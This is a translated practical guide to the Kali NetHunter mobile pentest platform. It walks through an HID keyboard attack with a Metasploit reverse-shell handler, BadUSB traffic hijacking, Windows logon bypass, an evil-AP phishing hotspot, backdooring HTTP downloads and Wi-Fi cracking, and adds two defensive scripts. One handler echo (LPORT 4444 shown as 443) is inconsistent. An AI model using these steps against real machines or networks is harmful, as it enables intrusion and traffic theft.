Pocket Hacking: NetHunter hands-on Guide

0x00 Preface

Many of my friends hope that a hacking kit can be moved easily from a PC to a more portable phone or tablet. Kali NetHunter, released by the Offensive Security team, has turned this expectation into reality: hacking from a mobile terminal anytime, anywhere.

Kali NetHunter is a portable penetration testing platform based on native Android. It uses Nexus phones and tablets as the base hardware (OnePlus phones are newly supported). The familiar Kali makes it easy to use, and the graphical control interface makes some tests easier. Engineers can also build their own projects on this platform.

There are relatively few articles about NetHunter at home or abroad, and they repeat each other a lot, so I have collected the main practical skills here for reference. Because information is scarce, errors are inevitable; if you notice an omission or mistake, please let me know.

0x01 hardware support

The NetHunter official website lists the following phones that can be flashed with NetHunter:

Nexus 4 (GSM) - “mako”
Nexus 5 (GSM/LTE) - “hammerhead”
Nexus 7 [2012] (Wi-Fi) - “nakasi”
Nexus 7 [2012] (Mobile) - “nakasig”
Nexus 7 [2013] (Wi-Fi) - “razor”
Nexus 7 [2013] (Mobile) - “razorg”
Nexus 10 (Tablet) - “mantaray”
OnePlus One 16 GB - “bacon”
OnePlus One 64 GB - “bacon”

It is worth mentioning that in the 2015 NetHunter update the OnePlus One was added to the support list because of its low cost and high performance. Good news for those with OnePlus phones; the flashing procedure below uses the Nexus 5 as an example.

0x02 Flashing process


Open the installer and install it to the default path.

After installation, run the NetHunter Installer and update it, then go to the installation wizard.

Step 1: select an existing hardware device model.

Step 2: Install the driver

You can test whether the installation succeeded with Test Drivers.

Step 3: Installation options

If you have already downloaded the flashing image from the official website, select the file with Browse. Check its SHA1 value after downloading. The Android Flash Setting option is not available because support for Android L is not yet complete.

Step 4: Download the files

Download all dependent files.

All the dependent packages are ready.

Step 5: Unlock the device

Unlock the bootloader. Note that USB debugging must be allowed; the phone will restart and unlock.

Step 6: Flash the stock Android

You can also choose to allow USB debugging on your phone here. Note that all data will be wiped, so remember to back it up first.

Step 7: Click NetHunter

Because the phone was reset in the previous step, developer mode must be re-enabled. Then click the Kali Linux image and root the phone. This takes a relatively long time. (Note: if the image cannot be pushed successfully, copy kali_linux_nethunter_1.10_hammerhead_kitkat.zip manually to the /sdcard/download/ directory and install it from there.)

Finally, the installation succeeds.

0x03 list of recommended apps

After the system is flashed, you will want to supplement the original NetHunter tools. Some Android apps are worth downloading for convenience.

Chinese input method: essential for us Chinese users.

File manager (such as Root Explorer): some files in Kali require a file manager that supports root permissions.

ShadowSocks: a proxy over the firewall is still required.

MITM tools:

ZANTI2: although some functions are restricted for commercial reasons, the user experience is indeed better.
dSploit: once well known.
lanmitm: a MITM tool compiled and released by security workers in China.
Intercepter-NG: sniffing tool.
Network Spoofer: comes with many playful functions.

IPTools: a collection of some common basic network tools

ChangeHostname: modify the hostname of the phone (possibly necessary).

WiGLE WiFi: wardriving tool that collects wireless hotspot information and can save it to a local database.

SQLiteEditor: for reading database contents easily.

Hacker's Keyboard: bundled with NetHunter; makes it easy to type the various control characters.

Remote Desktop: bundled with NetHunter; for connecting to the VNC service.

DriveDroid: bundled with NetHunter; presents an image stored on the phone as a boot disk.

0x04 directory and service

After installing NetHunter, first study its directories and services. The root directory of Kali NetHunter corresponds to /data/local/kali-armhf in the Android file system.

NetHunter's built-in tools are also under this directory, so if you cannot find where files such as packet captures or logs are stored, look here (note: root permission is required). In addition, the working directory that some NetHunter tools show at runtime is relative to this root.

Normally, intercepted packets and similar files are stored in the Captures directory under the NetHunter directory:

As in Kali Linux, most tools live in /usr/share with links set up, so they can be called directly from the command line.

Metasploit, however, is still in the /opt/ directory.

The /opt/dic directory contains dictionary files.

This is the /var/www directory. I trust you know how to use it :)

As for services, the Offensive Security team added NetHunter Home in the new version to manage the service switches in the form of an app. This avoids the drawbacks of the web server management in earlier versions (for example, the Google Fonts loaded by the web pages hung for ages because they are blocked by the firewall ;)

As shown, NetHunter Home is the main page. Besides the Offensive Security banner, it also shows the current IP addresses (intranet/internet).

Kali Launcher integrates four starters:

Open a Kali shell terminal
Open the Kali NetHunter menu in a terminal
Open Wifite to start wireless cracking
Update Kali NetHunter (executes sudo -c bootkali update)

The NetHunter service switches are set in the Kali Service Control panel.

As you can see, NetHunter can start services such as SSH, Dnsmasq, Hostapd, OpenVPN, Apache, Metasploit, and the BeEF framework.

SSH service: Secure Shell, for connecting to and controlling other devices.
dnsmasq service: DNS resolution service.
hostapd service: provides wireless access point services.
openVPN service: starts the OpenVPN connection service.
apache service: web service.
metasploit service: provides support for the MSF attack modules.
beEF framework service: the XSS exploitation framework service.

On this panel you can toggle each service.

0x05 Kali NetHunter Menu

In the NetHunter Launcher, the startup items of the Kali Menu include the commonly used NetHunter tools:

Compared with the previous version, the following options were added:

USB Attacks
NFC Attacks
Monitor Mode
Eject USB Wifi

The main modules and descriptions are as follows:

Wireless Attacks

Wifite

Automatic wireless security audit tool

Kismet

Wireless WarDriving Tool

Ap f**ker

Wireless network malicious attack tools (mostly denial-of-service)

Wash

Scan wireless networks with WPS Enabled

Airodump-ng

Basic wireless attack suite (required)

Pingen

Calculates the WPS PIN of some D-Link routers with WPS enabled, for cracking

Sniffing/Spoofing

Tcpdump

Basic traffic Dump Tool

Tshark

Wireshark CLI tool to capture and analyze traffic

Urlsnarf

Part of the Dsniff toolkit; sniffs HTTP request contents and outputs them in CLF (Common Log Format)

Dsniff

Powerful, well-known password sniffing toolkit

MITMproxy

Intercepting proxy that can intercept and modify HTTP traffic. For details, refer to the official website.

Reverse Shells

AutoSSH

Reverse shell over SSH (NAT bypass)

PTunnel

Tunnels data through ICMP packets

Info Gathering

Spiderfoot

Open-source scanning and information gathering tool: collects subdomains, email addresses, web server versions and other information for a given domain name, and runs automated scans.

Recon-ng

Powerful, modular information gathering tool, but many plug-ins do not work in China (because of the firewall).

Device-pharmer

Searches via Shodan; big-data hacking.

Vulnerability Scan

OpenVas

The vulnerability scanner requires an additional installation here, even though Kali includes it by default; make of that what you will :)

Exploit Tools

Metasploit

Powerful, core, essential

BeEF-XSS

XSS penetration testing tool; whether you use it depends on your habits

Social-Engineering-Toolkit

SET from Kali, the social engineering toolkit; powerful.

MITMf

Man-in-the-middle attack framework written in Python, with many plug-ins; powerful for penetration testing

OpenVPN Setup

OpenVPN settings

VNC Setup

VNC settings

Log/Capture Menu

All data captured locally can be erased or synchronized to the SD card (synchronization mainly solves a permission problem: most Android apps do not have root permission, so they cannot read the data captured by the NetHunter tools)

USB Attacks

Dictionary-based brute force attack

Automatically types each dictionary line followed by Enter, simulating an HID-based brute-force attack.

DeADBolt

Executes a series of ADB commands to copy private files and other information to a specified directory; see the project home page https://github.com/photonicgeek/deADBolt

NFC Attack

Provides functions to copy, rewrite and view M1 (Mifare) card data (no need to carry an ACR122U ;)

Settings

Change the time zone, create the Metasploit user and database, modify the MAC address, and install NodeJS.

Service

SSH service switch
VNC service switch
OpenVPN service switch
Start Xserver locally

Monitor Mode

Enable or disable monitor mode on wlan1 (the external wireless NIC)

Eject USB Wifi

Eject the USB wireless NIC

0x06 HID KeyBoard Attack

In the past, USB auto-start usually relied on autorun.inf on the inserted USB device. Nowadays that rarely works, and the emerging USB HID attack has become a new security threat: an emulated keyboard or mouse executes the target code in real time. Here, PowerSploit and MSF are used as the example:

First, run the web server that serves the payload: enable the Apache server in Kali Service Control.

Go to the HID attack configuration page and select PowerSploit.

Enter the IP address and port that MSF listens on. For Payload, select windows/meterpreter/reverse_https. The URL is the IP address of the machine providing the Apache service, here the local machine, 192.168.1.151.

After configuring, click UPDATE to write the configuration file. Next, configure the MSF listener to receive the reverse shell.

root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) >

The payload is the same as the one on the HID configuration page.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https

Set the same IP address and port:

msf exploit(handler) >
msf exploit(handler) > set LHOST 192.168.0.17
LHOST => 192.168.0.17
msf exploit(handler) > set LPORT 4444
LPORT => 443
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...

The configuration is now complete and the listener is running.

Connect the device to the PC. Wait until the device is recognized, then execute the command to start the attack.

After the PowerShell command runs, the reverse shell appears in msf:

If there is no response after connecting to the PC, press the Reset USB key to reset the USB connection and try again.

Of course, HID Keyboard Attack also provides a Windows CMD attack module: after the phone is connected to the computer, CMD is opened automatically and the specified command is executed (by default it adds a new administrator user; this can be customized).

0x07 BadUSB MITM Attack

BadUSB is an advanced USB attack method presented at the Black Hat conference: a payload such as emulated keyboard input performs certain operations automatically. NetHunter's BadUSB MITM Attack is one such method: it changes the network settings of the connected host and hijacks its network traffic.

The following operations are taken as an example:

First, make sure MTP file transfer is disabled when the phone is connected to the target computer. Connect to the target computer and enable USB tethering on the phone:

Now open a Kali shell from NetHunter Home and check that the NIC list contains an additional virtual NIC, rndis0 (the USB tethering NIC).

Now you can start tcpdump to capture traffic. The command is:

tcpdump -i rndis0

Return to NetHunter Home, switch to BadUSB MiTM Attack, and select Start BadUSB Attack in the upper right corner.

At this point the connected computer gets an extra NIC, and its gateway is the IP address of rndis0.

Traffic can now be intercepted. For example, when the computer visits some websites, tcpdump on the phone shows the following:

The PC does not get the page back because the phone has no SIM card and therefore no upstream network.

Someone mentioned the following in a previous article about Kali NetHunter on Drops:

Because of the emergence of the dual gateway, the traffic is not directed to the malicious gateway (10.0.0.1) as shown on the official website, but still goes through the previous gateway (192.168.1.1), so the hijacking fails.

This can indeed happen. In my own tests, however, the newly connected network had the higher priority: by default the hijacked gateway is preferred, so traffic was hijacked normally. It may also be an optimization NetHunter made after this year's update, as shown:
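
From the defender's side, the dual-gateway situation above is also the tell-tale symptom of this attack: a host suddenly has a second default route, and it leaves through a USB network interface. The POSIX shell snippet below is an added example (not code from the original article or from NetHunter) that parses the text of Linux `ip route`, reports whether such a route exists, and shows which default route the kernel prefers by metric, which is the priority point made above. The route tables are constructed samples (the 10.0.0.1 gateway mirrors the quoted article), and the USB interface names it matches (usb0, rndis0, enx<mac>) are assumptions about how Linux names RNDIS devices; a Windows host exposes the same information through `route print`, which this script does not parse.

```shell
#!/bin/sh
# Added example, not from the original article. Detects the symptom of the
# BadUSB MITM setup: a second default route via a USB/RNDIS interface.
# Input: the text of `ip route` on a Linux host (constructed samples below).

# Constructed sample: a normal laptop with one Wi-Fi default route.
NORMAL_ROUTES='default via 192.168.1.1 dev wlan0 proto dhcp metric 600
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.50 metric 600'

# Constructed sample: the same laptop after a USB gateway appeared.
ROGUE_ROUTES='default via 10.0.0.1 dev usb0 proto dhcp metric 100
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
10.0.0.0/24 dev usb0 proto kernel scope link src 10.0.0.2 metric 100
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.50 metric 600'

# check_routes ROUTE_TEXT
# Prints SUSPICIOUS when there is more than one default route or when any
# default route leaves through an interface named like a USB NIC
# (usb0, rndis0, enx<mac>, an assumption about driver naming); else OK.
check_routes() {
    printf '%s\n' "$1" | awk '
        $1 == "default" {
            n++
            for (i = 1; i < NF; i++)
                if ($i == "dev" && $(i + 1) ~ /^(usb|rndis|enx)/) usb++
        }
        END {
            if (n > 1 || usb > 0) print "SUSPICIOUS"; else print "OK"
        }'
}

# winning_gateway ROUTE_TEXT
# Prints "GATEWAY DEV" of the default route the kernel prefers: the lowest
# metric wins, and a route with no metric counts as 0 (highest priority).
winning_gateway() {
    printf '%s\n' "$1" | awk '
        $1 == "default" {
            gw = ""; dev = ""; metric = 0
            for (i = 1; i < NF; i++) {
                if ($i == "via")    gw = $(i + 1)
                if ($i == "dev")    dev = $(i + 1)
                if ($i == "metric") metric = $(i + 1) + 0
            }
            if (!seen || metric < best_metric) {
                best = gw " " dev; best_metric = metric; seen = 1
            }
        }
        END { print best }'
}

# Stand-alone run over the constructed samples.
echo "normal: $(check_routes "$NORMAL_ROUTES") via $(winning_gateway "$NORMAL_ROUTES")"
echo "rogue:  $(check_routes "$ROGUE_ROUTES") via $(winning_gateway "$ROGUE_ROUTES")"
```

On a live host, feed it the real table with `check_routes "$(ip route)"`. The rogue sample wins on metric 100 against the Wi-Fi route's 600, which is exactly why the hijack works in the author's test and why a monitoring script should alert on any new default route rather than only on a change of the old one.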

Of course, combining this with the HID Keyboard Attack is also a good way to test. Packet storage and analysis are left to you.

0x08 bypass Windows logon authentication

NetHunter actually has many hidden tricks, such as using DriveDroid to bypass the Windows logon password.

DriveDroid is an app that lets you boot a PC from an ISO/IMG image file stored on your Android phone. Combined with a specific image, it can bypass Windows logon authentication :)

Take Windows 7 as an example. First, set the password of the default account to hello.

DriveDroid stores boot images in SDCard/Download/images by default. You only need to put the image to boot from into this directory.

The image used here to bypass Windows or OS X logon authentication is Kon-Boot. Its official website explains how it hooks the BIOS boot process to modify the system kernel, skip the SAM check, and log on to the system directly. Because it is paid software, the following demonstration uses an image I found myself.

Disable MTP file transfer and open DriveDroid; it automatically lists the image files in the images directory.

Select the Kon-Boot.img image, choose Mount, and select Read-Only USB as the mode.

After the image loads successfully, it is marked.

On the connected PC, a new removable disk (or floppy drive) appears. If it does not, adjust the settings on the configuration page (the USB Setup Wizard can guide you).

Now restart the password-protected PC and enter the BIOS boot menu.

If the image loaded successfully, you see the flying pattern as follows:

Then, at the user's logon prompt, press Enter to bypass password authentication and log on to the system.

After logging on this way, you cannot directly modify or delete the system password.

0x09 WarDriving

I still remember the wardriving stories of my predecessors. With the development of smart devices, wardriving has moved to portable devices. However, I have not yet found a more suitable and intuitive wardriving tool, and I look forward to someone developing or recommending one.

In NetHunter, Kismet in the Wireless module of the Kali Menu is the default wardriving tool. However, the picture is too good to be true:

Instead, I recommend the WiGLE WiFi app. Be careful not to upload data by accident. It is easy to use, although the interface is ugly.

Fortunately, the data can be stored locally in SQLite database format.

0x10 Mana EvilAP Honeypot

Want to set up a CMCC wireless network phishing hotspot and hijack traffic? No Pineapple at hand? Take out your phone and open a honeypot :)

The Mana honeypot uses the same Karma-patched hostapd as the Pineapple; it can spoof wireless clients so that they connect smoothly to a fake AP for subsequent attacks.

Note that most NetHunter wireless attack modules require an external USB wireless NIC connected via OTG. NICs with mainstream chipsets that Kali recognizes directly can be tried; the WN722N is recommended, while the mini EDUP NIC is more universal (the Raspberry Pi also recognizes it directly), though its signal strength is, as you can imagine, weak.

The Mana honeypot has multiple hacking modes, all of them sh scripts that can be customized freely. The Mana tool is installed in:

/usr/share/mana-toolkit

The STARTUP script is stored here:

/usr/share/mana-toolkit/run-mana

Traffic interception files are stored in:

/var/lib/mana-toolkit

You can easily modify the configuration file on the Mana honeypot page of NetHunter Home:

Hostapd configuration file

DHCP service configuration file

DNS Spoofing configuration file

There are multiple service startup scripts, which can be freely edited and modified:

The first option corresponds to the script start-nat-full.sh. It requires a USB wireless NIC (with upstream connectivity) and starts the wireless network in NAT mode along with all the helper scripts, including firelamb, sslstrip, sslsplit and so on, so that traffic is intercepted and saved.

start-nat-simple.sh also has upstream connectivity, but does not start scripts such as firelamb, sslstrip and sslsplit.

start-nat-simple-bdf.sh adds the BDF (Backdoor Factory) code injection tool; the next chapter introduces its attack idea.

In addition:

start-noupstream.sh

Mana starts as a fake AP without Internet access, but it can still attract devices whose Wi-Fi is enabled by default to connect automatically, and capture information.

start-noupstream-eap.sh

Mana has no Internet access, but it launches EAP attacks.

After editing the startup file, click Start Attack; a window pops up showing the startup script being run:

and the service starts.

0x11 Backdooring Executable Over HTTP

This attack idea is interesting. The feature was released in the January 5 NetHunter version this year as Kali NetHunter's newest and coolest trick. It originates from secretsquirrel's GitHub projects the-backdoor-factory and BDFProxy, and lets you easily inject shellcode into binaries transmitted over plain HTTP.

First, create a Mana honeypot. The SSID uses the default name, internet. Start the service:

cd /usr/share/mana-toolkit/run-mana
./start-nat-simple-bdf.sh

Open another shell and edit bdfproxy.cfg, which contains the default payload settings for the different platforms. Because of display issues, text edited with nano is refreshed one row at a time, so it is better to edit it some other way. Here only the IP address, 192.168.1.151, needs to be changed. You can also configure it under MANA Evil Access Point in the main panel of NetHunter.

nano /etc/bdfproxy/bdfproxy.cfg

After configuring the IP address, type bdfproxy in the shell to run it.

Start Metasploit in another shell.

Everything is ready. Wait for a PC connected to the honeypot AP to download a binary; here it downloads Everything (the file search tool) from Baidu:

Run Everything. Because a payload was injected, a message saying its self-verification failed appears.

Check MSF: a shell has come back. The self-verification failure prompt above is a screenshot that Meterpreter helped me capture :)

I have to say, this new feature is really cool.
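
Two passages in this guide come down to the same defensive habit: the flashing section says to check the SHA1 of the downloaded NetHunter image, and the section above shows a binary arriving over plain HTTP that no longer matches what its publisher shipped (the program's own self-check caught it only after it had already run). The POSIX shell snippet below is an added example, not code from the original article or from any of the projects it mentions, that verifies a file against a digest published by its author before it is flashed or run, and refuses to proceed on a mismatch. It assumes GNU coreutils `sha1sum`/`sha256sum` as found on Kali, works on a constructed sample file, and takes for granted that the expected digest was obtained over a trusted channel such as the vendor's HTTPS page, since a digest fetched over the same plain HTTP connection proves nothing.

```shell
#!/bin/sh
# Added example, not from the original article. Verifies a downloaded file
# against a digest published by its author before it is flashed or run.
# Requires sha1sum/sha256sum (GNU coreutils), as on Kali itself.

# verify_digest FILE EXPECTED_HEX [ALGO]
# ALGO is sha1 (what the NetHunter download page listed) or sha256 (default).
# Prints MATCH or MISMATCH and returns 0 only on a match, so it can gate the
# next step of a script.
verify_digest() {
    file="$1"
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')   # published digests vary in case
    algo="${3:-sha256}"
    case "$algo" in
        sha1)   actual=$(sha1sum "$file" | awk '{print $1}') ;;
        sha256) actual=$(sha256sum "$file" | awk '{print $1}') ;;
        *)      echo "unsupported algorithm: $algo" >&2; return 2 ;;
    esac
    if [ "$actual" = "$expected" ]; then
        echo "MATCH $algo $file"
        return 0
    fi
    echo "MISMATCH $algo $file expected=$expected actual=$actual"
    return 1
}

# Stand-alone demonstration on a constructed file. The digests below are
# the well-known sums of the six bytes "hello\n".
HELLO_SHA1=f572d396fae9206628714fb2ce00f72e94f2258f
HELLO_SHA256=5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03

sample=$(mktemp)
printf 'hello\n' > "$sample"
verify_digest "$sample" "$HELLO_SHA1" sha1
verify_digest "$sample" "$HELLO_SHA256"

# Simulate a file modified in transit (one byte changed): the check fails,
# and the gating pattern refuses to go on.
printf 'hellp\n' > "$sample"
verify_digest "$sample" "$HELLO_SHA256" || echo "refusing to install $sample"
rm -f "$sample"
```

In a flashing script the pattern is `verify_digest image.zip "$PUBLISHED_SHA1" sha1 && flash image.zip`; for software downloads, prefer a SHA-256 digest or a code signature over SHA-1 where the publisher offers one, and treat a mismatch as a reason to stop rather than retry.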

0x12 Wifite cracking

Finally, it would be odd not to mention wireless cracking :) The Wifite cracking tool recommended by NetHunter is one of its earliest integrated functions. The portability of mobile devices makes Wi-Fi security testing possible anytime, anywhere: you only need an external wireless NIC to capture packets and crack them. However, I do not recommend cracking the captured packets directly on the mobile device; if it has not succeeded after a few minutes, move the capture to a high-performance machine, or the device may crash.

After connecting the external wireless NIC, select Launch Wifite in the NetHunter main menu.

Select the NIC to put into monitor mode; choose wlan1.

Scanning starts and refreshes every 5 seconds. Once the target is identified, press CTRL+C to stop scanning.

Enter the target's number; here XDSEC-WIFI is the target, so enter 2.

After the handshake is captured, dictionary cracking is invoked automatically. If the dictionary has been deleted, it exits automatically.

The captured handshake files are stored in the /data/local/kali-armhf/HS directory, named SSID + MAC.

If the target has WPS enabled, the PIN is cracked automatically.

Wifite is fairly foolproof and easy to operate, which suits mobile terminals. In my pentests, wireless password recovery has succeeded several times. After connecting to the wireless network, you can play with zANTI and other tools :)

